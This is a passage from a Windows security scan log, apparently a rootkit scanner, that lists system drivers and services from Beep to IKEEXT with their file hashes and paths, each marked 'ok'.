15:59:38.0441 0x42d8 [ 16A47CE2DECC9B099349A5F840654746, 77C008AEDB07FAC66413841D65C952DDB56FE7DCA5E9EF9C8F4130336B838024 ] Beep C:\Windows\system32\drivers\Beep.sys
15:59:38.0472 0x42d8 Beep - ok
15:59:38.0535 0x42d8 [ 82974D6A2FD19445CC5171FC378668A4, 075D25F47C0D2277E40AF8615571DAA5EB16B1824563632A9A7EC62505C29A4A ] BFE C:\Windows\System32\bfe.dll
15:59:38.0566 0x42d8 BFE - ok
15:59:38.0597 0x42d8 [ 1EA7969E3271CBC59E1730697DC74682, D511A34D63A6E0E6E7D1879068E2CD3D87ABEAF4936B2EA8CDDAD9F79D60FA04 ] BITS C:\Windows\system32\qmgr.dll
15:59:38.0628 0x42d8 BITS - ok
15:59:38.0659 0x42d8 [ 61583EE3C3A17003C4ACD0475646B4D3, 17E4BECC309C450E7E44F59A9C0BBC24D21BDC66DFBA65B8F198A00BB47A9811 ] blbdrive C:\Windows\system32\drivers\blbdrive.sys
15:59:38.0659 0x42d8 blbdrive - ok
15:59:38.0737 0x42d8 [ EBBCD5DFBB1DE70E8F4AF8FA59E401FD, 17BFFC5DF609CE3B2F0CAB4BD6C118608C66A3AD86116A47E90B2BB7D8954122 ] Bonjour Service C:\Program Files\Bonjour\mDNSResponder.exe
15:59:38.0769 0x42d8 Bonjour Service - ok
15:59:38.0815 0x42d8 [ 6C02A83164F5CC0A262F4199F0871CF5, AD4632A6A203CB40970D848315D8ADB9C898349E20D8DF4107C2AE2703A2CF28 ] bowser C:\Windows\system32\DRIVERS\bowser.sys
15:59:38.0847 0x42d8 bowser - ok
15:59:38.0878 0x42d8 [ F09EEE9EDC320B5E1501F749FDE686C8, 66691114C42E12F4CC6DC4078D4D2FA4029759ACDAF1B59D17383487180E84E3 ] BrFiltLo C:\Windows\system32\drivers\BrFiltLo.sys
15:59:38.0909 0x42d8 BrFiltLo - ok
15:59:38.0940 0x42d8 [ B114D3098E9BDB8BEA8B053685831BE6, 0ED23C1897F35FA00B9C2848DE4ED200E18688AA7825674888054BBC3A3EB92C ] BrFiltUp C:\Windows\system32\drivers\BrFiltUp.sys
15:59:38.0956 0x42d8 BrFiltUp - ok
15:59:39.0003 0x42d8 [ 5C2F352A4E961D72518261257AAE204B, 9EE1001E1D46A414A7A86FE1DBBE232203E26F54D9EF43ED31ED8EACD4D09853 ] BridgeMP C:\Windows\system32\DRIVERS\bridge.sys
15:59:39.0049 0x42d8 BridgeMP - ok
15:59:39.0096 0x42d8 [ 05F5A0D14A2EE1D8255C2AA0E9E8E694, 40011138869F5496A3E78D38C9900B466B6F3877526AC22952DCD528173F4645 ] Browser C:\Windows\System32\browser.dll
15:59:39.0112 0x42d8 Browser - ok
15:59:39.0127 0x42d8 [ 43BEA8D483BF1870F018E2D02E06A5BD, 4E6F5A5FD8C796A110B0DC9FF29E31EA78C04518FC1C840EF61BABD58AB10272 ] Brserid C:\Windows\System32\Drivers\Brserid.sys
15:59:39.0143 0x42d8 Brserid - ok
15:59:39.0159 0x42d8 [ A6ECA2151B08A09CACECA35C07F05B42, E2875BB7768ABAF38C3377007AA0A3C281503474D1831E396FB6599721586B0C ] BrSerWdm C:\Windows\System32\Drivers\BrSerWdm.sys
15:59:39.0159 0x42d8 BrSerWdm - ok
15:59:39.0190 0x42d8 [ B79968002C277E869CF38BD22CD61524, 50631836502237AF4893ECDCEA43B9031C3DE97433F594D46AF7C3C77F331983 ] BrUsbMdm C:\Windows\System32\Drivers\BrUsbMdm.sys
15:59:39.0190 0x42d8 BrUsbMdm - ok
15:59:39.0221 0x42d8 [ A87528880231C54E75EA7A44943B38BF, 4C8BBB29FDA76A96840AA47A8613C15D4466F9273A13941C19507008629709C9 ] BrUsbSer C:\Windows\System32\Drivers\BrUsbSer.sys
15:59:39.0237 0x42d8 BrUsbSer - ok
15:59:39.0268 0x42d8 [ C05ED3246C06EC56F10D85B0304CD09E, F479ED840D5BA4244391ABBB91D75D77D7A7D3F73F9AD45B7C7A137321B536AE ] BTATH_A2DP C:\Windows\system32\drivers\btath_a2dp.sys
15:59:39.0315 0x42d8 BTATH_A2DP - ok
15:59:39.0346 0x42d8 [ 2D27F7A831657D63AFC78E5E78DCA83F, 916A7B13A0BBFD62BEF2B124B75FDD675A29D6D939FEA0AD555D5B23DCEECB69 ] btath_avdt C:\Windows\system32\drivers\btath_avdt.sys
15:59:39.0346 0x42d8 btath_avdt - ok
15:59:39.0393 0x42d8 [ E6B734A37ADE36FE1A77035F4E484C8C, 7F3AB1E0CF9F348633B3B325F5F365CCD4C7FF7E4564BDE02C2DA27A499D0234 ] BTATH_BUS C:\Windows\system32\DRIVERS\btath_bus.sys
15:59:39.0439 0x42d8 BTATH_BUS - ok
15:59:39.0455 0x42d8 [ FB3833E63FF602B69C2FF085846DCF43, 468BC9580341AD4C65F0BBB3A11F3E39C1DD0F9694D098AB3647A181C03E4E11 ] BTATH_HCRP C:\Windows\system32\DRIVERS\btath_hcrp.sys
15:59:39.0486 0x42d8 BTATH_HCRP - ok
15:59:39.0517 0x42d8 [ 371A11C1333BA526263A987A93ACDE3D, 80E15B815F2B6F4AFBDDB115C4F54126F5D2796F6ACB387DEA9C4A1C061EB7EB ] BTATH_LWFLT C:\Windows\system32\DRIVERS\btath_lwflt.sys
15:59:39.0595 0x42d8 BTATH_LWFLT - ok
15:59:39.0627 0x42d8 [ ABCD3C16CA850A7594CEB9AD5D966810, DB0EAF000BB6F12F2AA550B66F5C61E08F2C6E58A18DA40BE69DD2B662D1EC60 ] BTATH_RCP C:\Windows\system32\DRIVERS\btath_rcp.sys
15:59:39.0658 0x42d8 BTATH_RCP - ok
15:59:39.0705 0x42d8 [ 13BDB661991ACF40ADCB09BD64A8CBEF, E0DA4A5F11F5175EF30019673F2B3675CA825466025D8494AE35E721D2E307CE ] BtFilter C:\Windows\system32\DRIVERS\btfilter.sys
15:59:39.0798 0x42d8 BtFilter - ok
15:59:39.0876 0x42d8 [ CF98190A94F62E405C8CB255018B2315, E1B2540023C4FE9FD588E4B6AE6347DFA565EB3898F21E5360882BF3E8B5E781 ] BthEnum C:\Windows\system32\drivers\BthEnum.sys
15:59:39.0907 0x42d8 BthEnum - ok
15:59:39.0939 0x42d8 [ 9DA669F11D1F894AB4EB69BF546A42E8, B498B8B6CEF957B73179D1ADAF084BBB57BB3735D810F9BE2C7B1D58A4FD25A4 ] BTHMODEM C:\Windows\system32\drivers\bthmodem.sys
15:59:39.0970 0x42d8 BTHMODEM - ok
15:59:40.0032 0x42d8 [ 02DD601B708DD0667E1331FA8518E9FF, 7DE6CC4DBB621CD03B01D9CE6CF66EAFE31D39030A391562CD0E278E1D70ADE1 ] BthPan C:\Windows\system32\DRIVERS\bthpan.sys
15:59:40.0063 0x42d8 BthPan - ok
15:59:40.0110 0x42d8 [ 738D0E9272F59EB7A1449C3EC118E6C4, FE3D32C2A5E4DC21376A0F89C0B2EE024ECF1A3FB99213CC9BBC986ADF7AF080 ] BTHPORT C:\Windows\System32\Drivers\BTHport.sys
15:59:40.0126 0x42d8 BTHPORT - ok
15:59:40.0173 0x42d8 [ 95F9C2976059462CBBF227F7AAB10DE9, 2797AE919FF7606B070FB039CECDB0707CD2131DCAC09C5DF14F443D881C9F34 ] bthserv C:\Windows\system32\bthserv.dll
15:59:40.0204 0x42d8 bthserv - ok
15:59:40.0219 0x42d8 [ F188B7394D81010767B6DF3178519A37, 576304E92FD94908F093A6AB5F4D328F25829BE32EC3CA0D29EBFDF5DE83539B ] BTHUSB C:\Windows\System32\Drivers\BTHUSB.sys
15:59:40.0235 0x42d8 BTHUSB - ok
15:59:40.0297 0x42d8 catchme - ok
15:59:40.0329 0x42d8 [ B8BD2BB284668C84865658C77574381A, 6C55BA288B626DF172FDFEA0BD7027FAEBA1F44EF20AB55160D7C7DC6E717D65 ] cdfs C:\Windows\system32\DRIVERS\cdfs.sys
15:59:40.0375 0x42d8 cdfs - ok
15:59:40.0438 0x42d8 [ F036CE71586E93D94DAB220D7BDF4416, BD07AAD9E20CEAF9FC84E4977C55EA2C45604A2C682AC70B9B9A2199B6713D5B ] cdrom C:\Windows\system32\DRIVERS\cdrom.sys
15:59:40.0469 0x42d8 cdrom - ok
15:59:40.0500 0x42d8 [ F17D1D393BBC69C5322FBFAFACA28C7F, 62A1A92B3C52ADFD0B808D7F69DD50238B5F202421F1786F7EAEAA63F274B3E8 ] CertPropSvc C:\Windows\System32\certprop.dll
15:59:40.0547 0x42d8 CertPropSvc - ok
15:59:40.0563 0x42d8 [ D7CD5C4E1B71FA62050515314CFB52CF, 513B5A849899F379F0BC6AB3A8A05C3493C2393C95F036612B96EC6E252E1C64 ] circlass C:\Windows\system32\drivers\circlass.sys
15:59:40.0578 0x42d8 circlass - ok
15:59:40.0687 0x42d8 [ 141205D6B1C5242FEF0CEFE57F4C213D, 1AF89683F5F217AA7FB7FF037E8EEC7174D05133C622D48A526B134669AAA124 ] CirrusLFD C:\Windows\system32\DRIVERS\CSLFDx64.sys
15:59:40.0781 0x42d8 CirrusLFD - ok
15:59:40.0812 0x42d8 [ FE1EC06F2253F691FE36217C592A0206, B9F122DB5E665ECDF29A5CB8BB6B531236F31A54A95769D6C5C1924C87FE70CE ] CLFS C:\Windows\system32\CLFS.sys
15:59:40.0843 0x42d8 CLFS - ok
15:59:40.0937 0x42d8 [ F13EC8A783E0CB0D6DC26A3CA848B7B8, 0809E3B71709F1343086EEB6C820543C1A7119E74EEF8AC1AEE1F81093ABEC66 ] clr_optimization_v2.0.50727_32 C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe
15:59:40.0968 0x42d8 clr_optimization_v2.0.50727_32 - ok
15:59:41.0015 0x42d8 [ B4D73F04E9BC076F7CDAC4327DF636BB, 1ADED20D5A0D0A76E2F85CB778FD06BAB814868D35F8532E17D67045FF4770C2 ] clr_optimization_v2.0.50727_64 C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorsvw.exe
15:59:41.0093 0x42d8 clr_optimization_v2.0.50727_64 - ok
15:59:41.0171 0x42d8 [ E87213F37A13E2B54391E40934F071D0, 7EB221127EFB5BF158FB03D18EFDA2C55FB6CE3D1A1FE69C01D70DBED02C87E5 ] clr_optimization_v4.0.30319_32 C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
15:59:41.0187 0x42d8 clr_optimization_v4.0.30319_32 - ok
15:59:41.0218 0x42d8 [ 4AEDAB50F83580D0B4D6CF78191F92AA, D113C47013B018B45161911B96E93AF96A2F3B34FA47061BF6E7A71FBA03194A ] clr_optimization_v4.0.30319_64 C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
15:59:41.0249 0x42d8 clr_optimization_v4.0.30319_64 - ok
15:59:41.0265 0x42d8 [ 0840155D0BDDF1190F84A663C284BD33, 696039FA63CFEB33487FAA8FD7BBDB220141E9C6E529355D768DFC87999A9C3A ] CmBatt C:\Windows\system32\drivers\CmBatt.sys
15:59:41.0280 0x42d8 CmBatt - ok
15:59:41.0311 0x42d8 [ E19D3F095812725D88F9001985B94EDD, 46243C5CCC4981CAC6FA6452FFCEC33329BF172448F1852D52592C9342E0E18B ] cmdide C:\Windows\system32\drivers\cmdide.sys
15:59:41.0311 0x42d8 cmdide - ok
15:59:41.0436 0x42d8 [ EBF28856F69CF094A902F884CF989706, AD6C9F0BC20AA49EEE5478DA0F856F0EA2B414B63208C5FFB03C9D7F5B59765F ] CNG C:\Windows\system32\Drivers\cng.sys
15:59:41.0452 0x42d8 CNG - ok
15:59:41.0499 0x42d8 [ 102DE219C3F61415F964C88E9085AD14, CD74CB703381F1382C32CF892FF2F908F4C9412E1BC77234F8FEA5D4666E1BF1 ] Compbatt C:\Windows\system32\drivers\compbatt.sys
15:59:41.0499 0x42d8 Compbatt - ok
15:59:41.0592 0x42d8 [ 03EDB043586CCEBA243D689BDDA370A8, 0E4523AA332E242D5C2C61C5717DBA5AB6E42DADB5A7E512505FC2B6CC224959 ] CompositeBus C:\Windows\system32\drivers\CompositeBus.sys
15:59:41.0623 0x42d8 CompositeBus - ok
15:59:41.0639 0x42d8 COMSysApp - ok
15:59:41.0764 0x42d8 [ 5E5E266092CCC08BB81B0FBEE5B85760, 236F3B68C9B3A4C0FE868A184B49BF504252DBC929DFC4098781676F68AA70ED ] cphs C:\Windows\SysWow64\IntelCpHeciSvc.exe
15:59:41.0795 0x42d8 cphs - ok
15:59:41.0811 0x42d8 [ 1C827878A998C18847245FE1F34EE597, 41EF7443D8B2733AA35CAC64B4F5F74FAC8BB0DA7D3936B69EC38E2DC3972E60 ] crcdisk C:\Windows\system32\drivers\crcdisk.sys
15:59:41.0826 0x42d8 crcdisk - ok
15:59:41.0857 0x42d8 [ 19D511CC455C19DE1ADF60E6C39C85B6, 2A05DD5EF3D0BEC2C9F4EA186E0E2D0F7BE0BF6A473D51194B09D33773AC7FAA ] CryptSvc C:\Windows\system32\cryptsvc.dll
15:59:41.0873 0x42d8 CryptSvc - ok
15:59:41.0982 0x42d8 [ 5C627D1B1138676C0A7AB2C2C190D123, C5003F2C912C5CA990E634818D3B4FD72F871900AF2948BD6C4D6400B354B401 ] DcomLaunch C:\Windows\system32\rpcss.dll
15:59:42.0013 0x42d8 DcomLaunch - ok
15:59:42.0045 0x42d8 [ 3CEC7631A84943677AA8FA8EE5B6B43D, 32061DAC9ED6C1EBA3B367B18D0E965AEEC2DF635DCF794EC39D086D32503AC5 ] defragsvc C:\Windows\System32\defragsvc.dll
15:59:42.0076 0x42d8 defragsvc - ok
15:59:42.0123 0x42d8 [ 9BB2EF44EAA163B29C4A4587887A0FE4, 03667BC3EA5003F4236929C10F23D8F108AFCB29DB5559E751FB26DFB318636F ] DfsC C:\Windows\system32\Drivers\dfsc.sys
15:59:42.0138 0x42d8 DfsC - ok
15:59:42.0185 0x42d8 [ 43D808F5D9E1A18E5EEB5EBC83969E4E, C10D1155D71EABE4ED44C656A8F13078A8A4E850C4A8FBB92D52D173430972B8 ] Dhcp C:\Windows\system32\dhcpcore.dll
15:59:42.0201 0x42d8 Dhcp - ok
15:59:42.0216 0x42d8 [ 13096B05847EC78F0977F2C0F79E9AB3, 1E44981B684F3E56F5D2439BB7FA78BD1BC876BB2265AE089AEC68F241B05B26 ] discache C:\Windows\system32\drivers\discache.sys
15:59:42.0247 0x42d8 discache - ok
15:59:42.0294 0x42d8 [ 9819EEE8B5EA3784EC4AF3B137A5244C, 571BC886E87C888DA96282E381A746D273B58B9074E84D4CA91275E26056D427 ] Disk C:\Windows\system32\drivers\disk.sys
15:59:42.0310 0x42d8 Disk - ok
15:59:42.0357 0x42d8 [ 16835866AAA693C7D7FCEBA8FFF706E4, 15891558F7C1F2BB57A98769601D447ED0D952354A8BB347312D034DC03E0242 ] Dnscache C:\Windows\System32\dnsrslvr.dll
15:59:42.0388 0x42d8 Dnscache - ok
15:59:42.0388 0x42d8 [ B1FB3DDCA0FDF408750D5843591AFBC6, AB6AD9C5E7BA2E3646D0115B67C4800D1CB43B4B12716397657C7ADEEE807304 ] dot3svc C:\Windows\System32\dot3svc.dll
15:59:42.0419 0x42d8 dot3svc - ok
15:59:42.0450 0x42d8 [ B26F4F737E8F9DF4F31AF6CF31D05820, 394BBBED4EC7FAD4110F62A43BFE0801D4AC56FFAC6C741C69407B26402311C7 ] DPS C:\Windows\system32\dps.dll
15:59:42.0481 0x42d8 DPS - ok
15:59:42.0513 0x42d8 [ 9B19F34400D24DF84C858A421C205754, 967AF267B4124BADA8F507CEBF25F2192D146A4D63BE71B45BFC03C5DA7F21A7 ] drmkaud C:\Windows\system32\drivers\drmkaud.sys
15:59:42.0544 0x42d8 drmkaud - ok
15:59:42.0591 0x42d8 [ F59E2FE2687A5C30598F9099F318EB73, 80A0B1CC758BD3C4AEAB8E5804120D8A145F918B527F41DEF02A0E4EBE170F37 ] DXGKrnl C:\Windows\System32\drivers\dxgkrnl.sys
15:59:42.0637 0x42d8 DXGKrnl - ok
15:59:42.0684 0x42d8 [ E2DDA8726DA9CB5B2C4000C9018A9633, 0C967DBC3636A76A696997192A158AA92A1AF19F01E3C66D5BF91818A8FAEA76 ] EapHost C:\Windows\System32\eapsvc.dll
15:59:42.0715 0x42d8 EapHost - ok
15:59:42.0825 0x42d8 [ DC5D737F51BE844D8C82C695EB17372F, 6D4022D9A46EDE89CEF0FAEADCC94C903234DFC460C0180D24FF9E38E8853017 ] ebdrv C:\Windows\system32\drivers\evbda.sys
15:59:42.0903 0x42d8 ebdrv - ok
15:59:42.0934 0x42d8 [ 204F3F58212B3E422C90BD9691A2DF28, D748A8CEE4D59B4248C9B1ACA5155D0FF6635A29564B4391B7FAC6261F93FE99 ] EFS C:\Windows\System32\lsass.exe
15:59:42.0949 0x42d8 EFS - ok
15:59:43.0043 0x42d8 [ C4002B6B41975F057D98C439030CEA07, 3D2484FBB832EFB90504DD406ED1CF3065139B1FE1646471811F3A5679EF75F1 ] ehRecvr C:\Windows\ehome\ehRecvr.exe
15:59:43.0074 0x42d8 ehRecvr - ok
15:59:43.0090 0x42d8 [ 4705E8EF9934482C5BB488CE28AFC681, 359E9EC5693CE0BE89082E1D5D8F5C5439A5B985010FF0CB45C11E3CFE30637D ] ehSched C:\Windows\ehome\ehsched.exe
15:59:43.0105 0x42d8 ehSched - ok
15:59:43.0230 0x42d8 [ 4CB575D97653FA91FFB02DA3105EB084, 59FB4D2485EEDBCC56D92C1F5DF3FEAE67D751F3AD7AEA7590F3C73107C829E8 ] ekrn C:\Program Files\ESET\ESET NOD32 Antivirus\x86\ekrn.exe
15:59:43.0261 0x42d8 ekrn - ok
15:59:43.0324 0x42d8 [ 0E5DA5369A0FCAEA12456DD852545184, 9A64AC5396F978C3B92794EDCE84DCA938E4662868250F8C18FA7C2C172233F8 ] elxstor C:\Windows\system32\drivers\elxstor.sys
15:59:43.0355 0x42d8 elxstor - ok
15:59:43.0371 0x42d8 [ 34A3C54752046E79A126E15C51DB409B, 7D5B5E150C7C73666F99CBAFF759029716C86F16B927E0078D77F8A696616D75 ] ErrDev C:\Windows\system32\drivers\errdev.sys
15:59:43.0371 0x42d8 ErrDev - ok
15:59:43.0433 0x42d8 [ 7029424F0F72B1E9912FA42786ED98A9, 8D70E4302991E0174F0C4658BB793A88DFC121F1858127B903B3E2E01DEECA7F ] ESETOlmarikOlmascoCleaner C:\Windows\system32\Drivers\ESETOlmarikOlmascoCleaner.sys
15:59:43.0464 0x42d8 ESETOlmarikOlmascoCleaner - ok
15:59:43.0495 0x42d8 [ 4166F82BE4D24938977DD1746BE9B8A0, 24121751B7306225AD1C808442D7B030DEF377E9316AA0A3C5C7460E87317881 ] EventSystem C:\Windows\system32\es.dll
15:59:43.0527 0x42d8 EventSystem - ok
15:59:43.0542 0x42d8 [ A510C654EC00C1E9BDD91EEB3A59823B, 76CD277730F7B08D375770CD373D786160F34D1481AF0536BA1A5D2727E255F5 ] exfat C:\Windows\system32\drivers\exfat.sys
15:59:43.0573 0x42d8 exfat - ok
15:59:43.0589 0x42d8 [ 0ADC83218B66A6DB380C330836F3E36D, 798D6F83B5DBCC1656595E0A96CF12087FCCBE19D1982890D0CE5F629B328B29 ] fastfat C:\Windows\system32\drivers\fastfat.sys
15:59:43.0620 0x42d8 fastfat - ok
15:59:43.0667 0x42d8 [ DBEFD454F8318A0EF691FDD2EAAB44EB, 7F52AE222FF28503B6FC4A5852BD0CAEAF187BE69AF4B577D3DE474C24366099 ] Fax C:\Windows\system32\fxssvc.exe
15:59:43.0683 0x42d8 Fax - ok
15:59:43.0714 0x42d8 [ D765D19CD8EF61F650C384F62FAC00AB, 9F0A483A043D3BA873232AD3BA5F7BF9173832550A27AF3E8BD433905BD2A0EE ] fdc C:\Windows\system32\drivers\fdc.sys
15:59:43.0714 0x42d8 fdc - ok
15:59:43.0745 0x42d8 [ 0438CAB2E03F4FB61455A7956026FE86, 6D4DDC2973DB25CE0C7646BC85EFBCC004EBE35EA683F62162AE317C6F1D8DFE ] fdPHost C:\Windows\system32\fdPHost.dll
15:59:43.0823 0x42d8 fdPHost - ok
15:59:43.0839 0x42d8 [ 802496CB59A30349F9A6DD22D6947644, 52D59D3D628D5661F83F090F33F744F6916E0CC1F76E5A33983E06EB66AE19F8 ] FDResPub C:\Windows\system32\fdrespub.dll
15:59:43.0854 0x42d8 FDResPub - ok
15:59:43.0901 0x42d8 [ 655661BE46B5F5F3FD454E2C3095B930, 549C8E2A2A37757E560D55FFA6BFDD838205F17E40561E67F0124C934272CD1A ] FileInfo C:\Windows\system32\drivers\fileinfo.sys
15:59:43.0901 0x42d8 FileInfo - ok
15:59:43.0917 0x42d8 [ 5F671AB5BC87EEA04EC38A6CD5962A47, 6B61D3363FF3F9C439BD51102C284972EAE96ACC0683B9DC7E12D25D0ADC51B6 ] Filetrace C:\Windows\system32\drivers\filetrace.sys
15:59:43.0932 0x42d8 Filetrace - ok
15:59:43.0948 0x42d8 [ C172A0F53008EAEB8EA33FE10E177AF5, 9175A95B323696D1B35C9EFEB7790DD64E6EE0B7021E6C18E2F81009B169D77B ] flpydisk C:\Windows\system32\drivers\flpydisk.sys
15:59:43.0948 0x42d8 flpydisk - ok
15:59:43.0979 0x42d8 [ DA6B67270FD9DB3697B20FCE94950741, F621A4462C9F2904063578C427FAF22D7D66AE9967605C11C798099817CE5331 ] FltMgr C:\Windows\system32\drivers\fltmgr.sys
15:59:43.0995 0x42d8 FltMgr - ok
15:59:44.0088 0x42d8 [ C4C183E6551084039EC862DA1C945E3D, 0874A2ACDD24D64965AA9A76E9C818E216880AE4C9A2E07ED932EE404585CEE6 ] FontCache C:\Windows\system32\FntCache.dll
15:59:44.0119 0x42d8 FontCache - ok
15:59:44.0166 0x42d8 [ A8B7F3818AB65695E3A0BB3279F6DCE6, 89FCF10F599767E67A1E011753E34DA44EAA311F105DBF69549009ED932A60F0 ] FontCache3.0.0.0 C:\Windows\Microsoft.Net\Framework64\v3.0\WPF\PresentationFontCache.exe
15:59:44.0166 0x42d8 FontCache3.0.0.0 - ok
15:59:44.0213 0x42d8 [ D43703496149971890703B4B1B723EAC, F06397B2EDCA61629249D2EF1CBB7827A8BEAB8488246BD85EF6AE1363C0DA6E ] FsDepends C:\Windows\system32\drivers\FsDepends.sys
15:59:44.0244 0x42d8 FsDepends - ok
15:59:44.0275 0x42d8 [ 6BD9295CC032DD3077C671FCCF579A7B, 83622FBB0CB923798E7E584BF53CAAF75B8C016E3FF7F0FA35880FF34D1DFE33 ] Fs_Rec C:\Windows\system32\drivers\Fs_Rec.sys
15:59:44.0291 0x42d8 Fs_Rec - ok
15:59:44.0338 0x42d8 [ 8F6322049018354F45F05A2FD2D4E5E0, 73BF0FB4EBD7887E992DDEBB79E906958D6678F8D1107E8C368F5A0514D80359 ] fvevol C:\Windows\system32\DRIVERS\fvevol.sys
15:59:44.0416 0x42d8 fvevol - ok
15:59:44.0431 0x42d8 [ 8C778D335C9D272CFD3298AB02ABE3B6, 85F0B13926B0F693FA9E70AA58DE47100E4B6F893772EBE4300C37D9A36E6005 ] gagp30kx C:\Windows\system32\drivers\gagp30kx.sys
15:59:44.0447 0x42d8 gagp30kx - ok
15:59:44.0478 0x42d8 [ 8E98D21EE06192492A5671A6144D092F, B8F656B34D361EA5AFB47F3A67AB2221580DADA59C8CD0CB83181E4AD8B562B4 ] GEARAspiWDM C:\Windows\system32\DRIVERS\GEARAspiWDM.sys
15:59:44.0494 0x42d8 GEARAspiWDM - ok
15:59:44.0556 0x42d8 [ 277BBC7E1AA1EE957F573A10ECA7EF3A, 2EE60B924E583E847CC24E78B401EF95C69DB777A5B74E1EC963E18D47B94D24 ] gpsvc C:\Windows\System32\gpsvc.dll
15:59:44.0603 0x42d8 gpsvc - ok
15:59:44.0603 0x42d8 [ F2523EF6460FC42405B12248338AB2F0, B2F3DE8DE1F512D871BC2BC2E8D0E33AB03335BFBC07627C5F88B65024928E19 ] hcw85cir C:\Windows\system32\drivers\hcw85cir.sys
15:59:44.0619 0x42d8 hcw85cir - ok
15:59:44.0650 0x42d8 [ 975761C778E33CD22498059B91E7373A, 8304E15FBE6876BE57263A03621365DA8C88005EAC532A770303C06799D915D9 ] HdAudAddService C:\Windows\system32\drivers\HdAudio.sys
15:59:44.0665 0x42d8 HdAudAddService - ok
15:59:44.0697 0x42d8 [ 97BFED39B6B79EB12CDDBFEED51F56BB, 3CF981D668FB2381E52AF2E51E296C6CFB47B0D62249645278479D0111A47955 ] HDAudBus C:\Windows\system32\drivers\HDAudBus.sys
15:59:44.0712 0x42d8 HDAudBus - ok
15:59:44.0759 0x42d8 [ 78E86380454A7B10A5EB255DC44A355F, 11F3ED7ACFFA3024B9BD504F81AC39F5B4CED5A8A425E8BADF7132EFEDB9BD64 ] HidBatt C:\Windows\system32\drivers\HidBatt.sys
15:59:44.0775 0x42d8 HidBatt - ok
15:59:44.0790 0x42d8 [ FDF5EAD19FD8B2D0C50A9CCDD7836F9E, B865703E3D9BFC75DF363BF943213C47A63445415E211000717009D2BD0C062B ] HidBth C:\Windows\system32\drivers\hidbth.sys
15:59:44.0806 0x42d8 HidBth - ok
15:59:44.0837 0x42d8 [ 0A77D29F311B88CFAE3B13F9C1A73825, 8615DC6CEFB591505CE16E054A71A4F371B827DDFD5E980777AB4233DCFDA01D ] HidIr C:\Windows\system32\drivers\hidir.sys
15:59:44.0853 0x42d8 HidIr - ok
15:59:44.0884 0x42d8 [ BD9EB3958F213F96B97B1D897DEE006D, 4D01CBF898B528B3A4E5A683DF2177300AFABD7D4CB51F1A7891B1B545499631 ] hidserv C:\Windows\System32\hidserv.dll
15:59:44.0931 0x42d8 hidserv - ok
15:59:44.0977 0x42d8 [ 9592090A7E2B61CD582B612B6DF70536, FD11D5E02C32D658B28FCC35688AB66CCB5D3A0A0D74C82AE0F0B6C67B568A0F ] HidUsb C:\Windows\system32\drivers\hidusb.sys
15:59:45.0009 0x42d8 HidUsb - ok
15:59:45.0087 0x42d8 [ 387E72E739E15E3D37907A86D9FF98E2, 9935BE2E58788E79328293AF2F202CB0F6042441B176F75ACC5AEA93C8E05531 ] hkmsvc C:\Windows\system32\kmsvc.dll
15:59:45.0118 0x42d8 hkmsvc - ok
15:59:45.0149 0x42d8 [ EFDFB3DD38A4376F93E7985173813ABD, 70402FA73A5A2A8BB557AAC8F531E373077D28DE5F40A1F3F14B940BE01CD2E1 ] HomeGroupListener C:\Windows\system32\ListSvc.dll
15:59:45.0149 0x42d8 HomeGroupListener - ok
15:59:45.0196 0x42d8 [ 908ACB1F594274965A53926B10C81E89, 7D34A742AC486294D82676F8465A3EF26C8AC3317C32B63F62031CB007CFC208 ] HomeGroupProvider C:\Windows\system32\provsvc.dll
15:59:45.0196 0x42d8 HomeGroupProvider - ok
15:59:45.0243 0x42d8 [ 39D2ABCD392F3D8A6DCE7B60AE7B8EFC, E9E6A1665740CFBC2DD321010007EF42ABA2102AEB9772EE8AA3354664B1E205 ] HpSAMD C:\Windows\system32\drivers\HpSAMD.sys
15:59:45.0258 0x42d8 HpSAMD - ok
15:59:45.0289 0x42d8 [ 0EA7DE1ACB728DD5A369FD742D6EEE28, 21C489412EB33A12B22290EB701C19BA57006E8702E76F730954F0784DDE9779 ] HTTP C:\Windows\system32\drivers\HTTP.sys
15:59:45.0321 0x42d8 HTTP - ok
15:59:45.0336 0x42d8 [ A5462BD6884960C9DC85ED49D34FF392, 53E65841AF5B06A2844D0BB6FC4DD3923A323FFA0E4BFC89B3B5CAFB592A3D53 ] hwpolicy C:\Windows\system32\drivers\hwpolicy.sys
15:59:45.0352 0x42d8 hwpolicy - ok
15:59:45.0430 0x42d8 [ FA55C73D4AFFA7EE23AC4BE53B4592D3, 65CDDC62B89A60E942C5642C9D8B539EFB69DA8069B4A2E54978154B314531CD ] i8042prt C:\Windows\system32\drivers\i8042prt.sys
15:59:45.0477 0x42d8 i8042prt - ok
15:59:45.0555 0x42d8 [ D1753C06EE17E29352B065EACF3F10D0, 4DD4C991FAA3CCF99DF8DC9F8F5DEEDEECD55977F0C3AA8C404DEFD21E32A62B ] iaStor C:\Windows\system32\drivers\iaStor.sys
15:59:45.0570 0x42d8 iaStor - ok
15:59:45.0648 0x42d8 [ AAAF44DB3BD0B9D1FB6969B23ECC8366, 805AA4A9464002D1AB3832E4106B2AAA1331F4281367E75956062AAE99699385 ] iaStorV C:\Windows\system32\drivers\iaStorV.sys
15:59:45.0664 0x42d8 iaStorV - ok
15:59:45.0742 0x42d8 [ C98A5B9D932430AD8EEBD3EF73756EF7, DF7E1D391A0F3345AD61154363922C27BD557DEEACE395A6A8A8A16BFD1BB9A8 ] idsvc C:\Windows\Microsoft.NET\Framework64\v3.0\Windows Communication Foundation\infocard.exe
15:59:45.0835 0x42d8 idsvc - ok
15:59:45.0867 0x42d8 IEEtwCollectorService - ok
15:59:46.0288 0x42d8 [ 9AA61DC7AA32C1D1260C4267FF07E0C1, 34FEE032C2585600E612A6CFEE33AD4C0C140B04ADB0B08825F2FC5505480366 ] igfx C:\Windows\system32\DRIVERS\igdkmd64.sys
15:59:46.0709 0x42d8 igfx - ok
15:59:46.0740 0x42d8 [ 5C18831C61933628F5BB0EA2675B9D21, 5CD9DE2F8C0256623A417B5C55BF55BB2562BD7AB2C3C83BB3D9886C2FBDA4E4 ] iirsp C:\Windows\system32\drivers\iirsp.sys
15:59:46.0756 0x42d8 iirsp - ok
15:59:46.0849 0x42d8 [ 344789398EC3EE5A4E00C52B31847946, 3DA5F08E4B46F4E63456AA588D49E39A6A09A97D0509880C00F327623DB6122D ] IKEEXT C:\Windows\System32\ikeext.dll
15:59:46.0881 0x42d8 IKEEXT - ok
